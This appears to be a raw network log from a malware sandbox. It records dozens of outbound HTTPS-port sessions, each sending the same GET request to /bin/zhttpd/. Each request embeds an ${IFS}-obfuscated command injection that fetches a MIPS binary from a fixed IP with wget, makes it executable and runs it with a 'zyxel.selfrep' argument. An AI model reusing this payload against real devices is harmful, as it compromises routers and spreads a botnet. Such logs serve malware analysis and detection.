                                                Jan 29, 2024 07:08:05.683615923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8701192.168.2.235692417.219.227.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683656931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8702192.168.2.2355822120.243.211.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683700085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8703192.168.2.235906447.46.242.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683717966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8704192.168.2.2356634117.59.177.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683762074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8705192.168.2.234276458.152.217.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683820009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8706192.168.2.2336462160.27.42.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683852911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8707192.168.2.234218225.129.22.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683898926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8708192.168.2.234580024.60.39.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683919907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8709192.168.2.2346088140.13.190.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.683964014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8710192.168.2.23388984.33.42.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684016943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8711192.168.2.2347498203.92.104.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684051037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8712192.168.2.2358266116.213.136.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684093952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8713192.168.2.2360518137.114.11.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684118032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8714192.168.2.234370657.22.133.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684175968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8715192.168.2.2357294195.194.65.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684225082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8716192.168.2.235944687.157.55.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684246063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8717192.168.2.2347118204.2.28.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684284925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8718192.168.2.233417052.68.104.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684320927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8719192.168.2.2341260194.96.202.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684357882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8720192.168.2.234593888.242.78.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684432030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8721192.168.2.2336100195.49.196.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684465885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8722192.168.2.2350140129.19.241.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684511900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8723192.168.2.235776852.59.19.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684537888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8724192.168.2.235307452.170.172.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684596062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8725192.168.2.234772469.206.50.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684627056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8726192.168.2.233904688.178.140.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684659004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8727192.168.2.2344866100.153.146.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684705973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8728192.168.2.2349318106.49.137.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684736967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8729192.168.2.235595067.163.122.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684788942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8730192.168.2.234809265.195.213.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684842110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8731192.168.2.233374674.2.137.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684876919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8732192.168.2.2353276140.118.181.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684895992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8733192.168.2.235924827.106.248.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684930086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8734192.168.2.2333514199.18.71.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.684978962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8735192.168.2.2359890185.89.138.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685015917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8736192.168.2.233574689.151.234.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685069084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8737192.168.2.2346054219.75.145.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685094118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8738192.168.2.233669044.65.12.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685118914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8739192.168.2.233801623.238.90.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685154915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8740192.168.2.2345548165.53.51.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685168982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8741192.168.2.2348950217.223.26.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685231924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8742192.168.2.2351152104.62.4.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685281992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8743192.168.2.23399008.25.154.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685301065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8744192.168.2.2335602147.186.2.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685363054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8745192.168.2.2339840154.227.80.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685406923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8746192.168.2.236066213.130.227.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685431957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8747192.168.2.234900848.114.94.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685477972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8748192.168.2.234205869.1.58.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685533047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8749192.168.2.233944870.6.123.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685566902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8750192.168.2.234777253.129.100.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685611963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8751192.168.2.2347438187.219.78.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685650110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8752192.168.2.235532445.247.204.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685688019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8753192.168.2.2333084188.188.94.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685724020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8754192.168.2.2345352160.40.98.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685760975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8755192.168.2.2340368151.25.157.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685792923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8756192.168.2.235516066.95.9.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685837030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8757192.168.2.2358738212.180.19.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685867071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8758192.168.2.234787074.196.160.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685904026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8759192.168.2.2337200159.73.90.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685933113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8760192.168.2.2358570138.202.40.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.685997963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8761192.168.2.235992654.189.241.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686031103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8762192.168.2.234413869.227.212.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686086893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8763192.168.2.2358264182.228.215.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:05.686120987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8764192.168.2.2349808151.72.118.210443
                                                TimestampBytes transferredDirectionData
